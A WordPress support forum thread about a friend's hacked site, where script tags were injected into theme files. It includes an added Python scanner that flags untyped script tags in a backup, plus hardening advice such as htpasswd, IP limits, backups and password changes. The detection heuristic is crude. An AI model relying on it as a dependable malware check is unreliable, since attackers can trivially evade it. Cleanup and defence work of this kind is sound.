Viewing 3 replies - 1 through 3 (of 3 total)
  • Thread Starter tginsandiego

    (@tginsandiego)

    PS — I was able to determine that she is using WordPress version 2.8.6.

    Thread Starter tginsandiego

    (@tginsandiego)

    Found and fixed the bad code. They had injected the script tags into header.php and 404.php inside the theme.

    Once I had backed up the site to my local hard disk, I was able to use a findfile tool to search the entire site and locate the offending code pretty easily. Searching for <script> quickly located the code, because all of the real/good script tags used by WordPress typically don’t close the tag without specifying a text/javascript type.

    So the important lesson I learned was to use a traffic sniffer (like FIDDLER) to quickly see what’s going on.

    I would still appreciate it if some kind expert could help my friend harden her site.

    Thanks

    Terry
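
The search described in the post above, as an added example that is not part of the original thread: a Python scan of a local backup copy for opening script tags that carry no type attribute. The function names, the extension list and the two sample theme files are constructed for illustration; hits are leads to review by hand, since a theme can legitimately omit the attribute.

```python
import os
import re
import tempfile

# An embedded <?php ... ?> block is consumed whole so its "?>" does not end the tag early.
SCRIPT_TAG = re.compile(r"<script\b((?:<\?.*?\?>|[^>])*)>", re.I | re.S)
HAS_TYPE = re.compile(r"(?<![\w-])type\s*=", re.I)
SCAN_EXT = (".php", ".html", ".htm", ".inc")  # assumed set of template extensions


def find_untyped_script_tags(text):
    """Return [(line_number, tag)] for opening script tags with no type attribute."""
    hits = []
    for m in SCRIPT_TAG.finditer(text):
        if not HAS_TYPE.search(m.group(1)):
            line = text.count("\n", 0, m.start()) + 1
            hits.append((line, m.group(0)))
    return hits


def scan_backup(root):
    """Walk a local backup copy and return {relative_path: hits} for flagged files."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(SCAN_EXT):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = find_untyped_script_tags(fh.read())
                if hits:
                    report[os.path.relpath(path, root)] = hits
    return report


def demo():
    """Build a constructed two-file theme in a temp dir and scan it."""
    clean = '<script src="<?php echo $u; ?>/a.js" type="text/javascript"></script>\n'
    tampered = "<?php get_header(); ?>\n<script>/* constructed placeholder */</script>\n"
    with tempfile.TemporaryDirectory() as root:
        theme = os.path.join(root, "wp-content", "themes", "example")
        os.makedirs(theme)
        for name, body in (("header.php", clean), ("404.php", tampered)):
            with open(os.path.join(theme, name), "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_backup(root)


if __name__ == "__main__":
    print(demo())
```

Point `scan_backup()` at the downloaded copy of the site, never at the live server, and compare each flagged file against a clean copy of the theme.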

    Couldn’t you have just right-clicked, then viewed the page source? I think a traffic sniffer is perhaps overkill for this particular problem, but if it worked for you, great! Did you check the SQL database itself too by the way?

    Anyway, why was she hacked? Not keeping her version of WordPress up to date? Rubbish host? Other insecure script? Obvious password?

    There’s a good hack clean guide here:
    https://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/

    Hardening-wise, think about htpasswd protecting her wp-admin folder. If you can limit access to a certain IP, even better.

    Make sure there’s a good backup routine in place. You can download plugins to do this automagically, i.e.:
    https://www.ads-software.com/extend/plugins/wp-db-backup/

    Change all passwords, admin, database and FTP to something strong.

    Have a read of this too:
    https://codex.www.ads-software.com/Hardening_WordPress

  • The topic ‘A friend’s site was hacked…’ is closed to new replies.